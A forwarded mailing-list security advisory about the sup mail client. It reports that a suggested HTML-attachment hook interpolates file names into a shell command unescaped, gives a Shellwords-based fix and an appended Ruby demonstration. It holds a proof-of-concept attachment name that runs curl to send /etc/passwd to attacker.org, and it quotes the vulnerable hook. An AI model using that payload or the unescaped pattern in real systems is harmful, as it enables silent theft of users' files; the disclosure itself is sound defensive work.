
Fwd: Security issue with suggested configuration of sup



Greetings suppers,

joernchen has pointed out to me that our suggested hook for viewing HTML
attachments has a serious security issue. The updated suggestion in [0] (wiki)
should be safer.


Please make sure that you update your mime-decode hook!


Best regards, Gaute



[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments



--- Begin forwarded message from joernchen ---
From: joernchen <...>
To: eg <eg@gaute.vetsj.com>
Date: Sat, 17 Aug 2013 14:14:29 +0200
Subject: Security issue with suggested configuration of sup

[...]

At [0] the suggested configuration for viewing HTML attachments with
sup using the mime-decode hook is given as follows:

unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    # filename is interpolated into a shell command line unescaped; the
    # single quotes do not help once the name itself contains a quote
    `/usr/bin/w3m -dump -T #{content_type} '#{filename}'`
  end
end

This piece of code, however, is prone to command injection via the file
name of the attached file. The command injection triggers upon sup
indexing the mail, so no user interaction is needed.

A better approach would be the following:

require 'shellwords'
unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    # Shellwords.escape backslash-escapes every shell metacharacter in the
    # name, so the whole file name reaches w3m as a single argument.
    # content_type is safe to interpolate here only because the case
    # branch matched the literal "text/html".
    `/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}`
  end
end

[...]

A simple PoC would be sending an email with a file attachment named
like:

'$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd attacker.org)'.html

to a sup user making use of the suggested decode hook.

[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments

[...]
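The following is an added example, not code from the mail or from the sup wiki. It builds the command line the same way the vulnerable hook and the Shellwords-escaped hook do, and runs both against a constructed attachment name shaped like the PoC above but carrying a harmless `$(echo INJECTED)` payload. `printf` is assumed as a stand-in for `/usr/bin/w3m` so the example runs without w3m installed. A third variant, also an assumption beyond the mail, skips the shell entirely by passing an argv array to `IO.popen`.

```ruby
require 'shellwords'

# Constructed sample attachment name: the quotes close the hook's own
# single-quoted string and the $(...) is then executed by /bin/sh.
MALICIOUS_NAME = "'$(echo INJECTED)'.html"

# Assumption: printf stands in for /usr/bin/w3m so the example runs anywhere.
VIEWER = "printf '%s\\n'"

# Mirrors the original hook: the name is dropped into the command line
# inside single quotes, which a single quote in the name breaks out of.
def vulnerable_command(filename)
  "#{VIEWER} '#{filename}'"
end

# Mirrors the fixed hook: every shell metacharacter is backslash-escaped.
def safe_command(filename)
  "#{VIEWER} #{Shellwords.escape filename}"
end

# Backticks hand the string to /bin/sh -c, exactly like the hook does.
def run_vulnerable(filename)
  `#{vulnerable_command(filename)}`
end

def run_safe(filename)
  `#{safe_command(filename)}`
end

# Assumed alternative: an argv array is exec'd directly, no shell involved,
# so the name cannot be parsed as shell syntax at all.
def run_argv(filename)
  IO.popen(["printf", "%s\n", filename]) { |io| io.read }
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{run_vulnerable(MALICIOUS_NAME).inspect}"
  puts "escaped:    #{run_safe(MALICIOUS_NAME).inspect}"
  puts "argv:       #{run_argv(MALICIOUS_NAME).inspect}"
end
```

The vulnerable variant prints `INJECTED.html`, proof that the embedded `echo` ran before the viewer ever saw the name; both hardened variants print the attachment name literally. Where a hook can use the argv form, prefer it: it removes the shell from the path rather than relying on escaping being applied to every interpolated value.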